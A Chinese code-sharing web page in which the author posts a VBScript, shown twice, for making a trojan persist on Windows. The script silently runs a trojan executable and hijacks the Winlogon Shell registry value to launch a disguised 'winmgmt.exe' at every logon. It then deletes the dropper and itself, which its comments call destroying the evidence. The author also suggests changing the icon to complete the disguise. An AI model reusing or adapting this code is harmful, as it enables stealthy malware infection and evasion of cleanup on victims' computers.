vbs 注冊表實現(xiàn)木馬自啟動
更新時間:2009年05月13日 17:06:34 作者:
自己搗鼓了半天,終于寫出了個腳本,實現(xiàn)flux在注冊表中的啟動,當(dāng)然是更隱蔽的方法,別人知道了這個地方也就沒戲了。
呵呵~不過別人一般沒這個閑工夫檢查那么多位置的!就連我也做不到~~
dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "%windir%\flumasko.exe",0 //運行木馬程序
set sm=Wscript.CreateObject("WScript.Shell")
sm.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","Explorer.exe %systemroot%\system32\winmgmt.exe"
//寫進注冊表項實現(xiàn)自啟動
set WshShell=WScript.CreateObject("WScript.Shell")
WScript.Sleep 2000
//等木馬的執(zhí)行完畢
Set fso=CreateObject("Scripting.FileSystemObject")
f=fso.DeleteFile ("flumasko.exe")
f=fso.DeleteFile (WScript.ScriptName)
//毀尸滅跡
再修改下圖標(biāo)就大功告成了!
復(fù)制代碼 代碼如下:
dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "%windir%\flumasko.exe",0 //運行木馬程序
set sm=Wscript.CreateObject("WScript.Shell")
sm.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","Explorer.exe %systemroot%\system32\winmgmt.exe"
//寫進注冊表項實現(xiàn)自啟動
set WshShell=WScript.CreateObject("WScript.Shell")
WScript.Sleep 2000
//等木馬的執(zhí)行完畢
Set fso=CreateObject("Scripting.FileSystemObject")
f=fso.DeleteFile ("flumasko.exe")
f=fso.DeleteFile (WScript.ScriptName)
//毀尸滅跡
相關(guān)文章
VBS教程:VBscript語句-Option Explicit 語句
VBS教程:VBscript語句-Option Explicit 語句...2006-11-11vbs實現(xiàn)的eMule電驢自動關(guān)機腳本代碼
verycd,eMule電驢官方網(wǎng)站上說:為了不違背共享精神,是不會為eMule電驢添加自動關(guān)機功能的,這要多費電呀,在網(wǎng)上看了一個方法,感覺非常不錯,改掉了原代碼的不足之處2008-07-07vbs(asp) ByVal ByRef函數(shù)調(diào)用使用說明
ByVal 傳送參數(shù)內(nèi)存的一個拷貝給被調(diào)用者。也就是說,棧中壓入的直接就是所傳的值。 ByRef 傳送參數(shù)內(nèi)存的實際地址給被調(diào)用者。也就是說,棧中壓入的是實際內(nèi)容的地址。被調(diào)用者可以直接更改該地址中的內(nèi)容。2008-09-09VBS教程:VBScript 基礎(chǔ)-VBScript編碼約定
VBS教程:VBScript 基礎(chǔ)-VBScript編碼約定...2006-11-11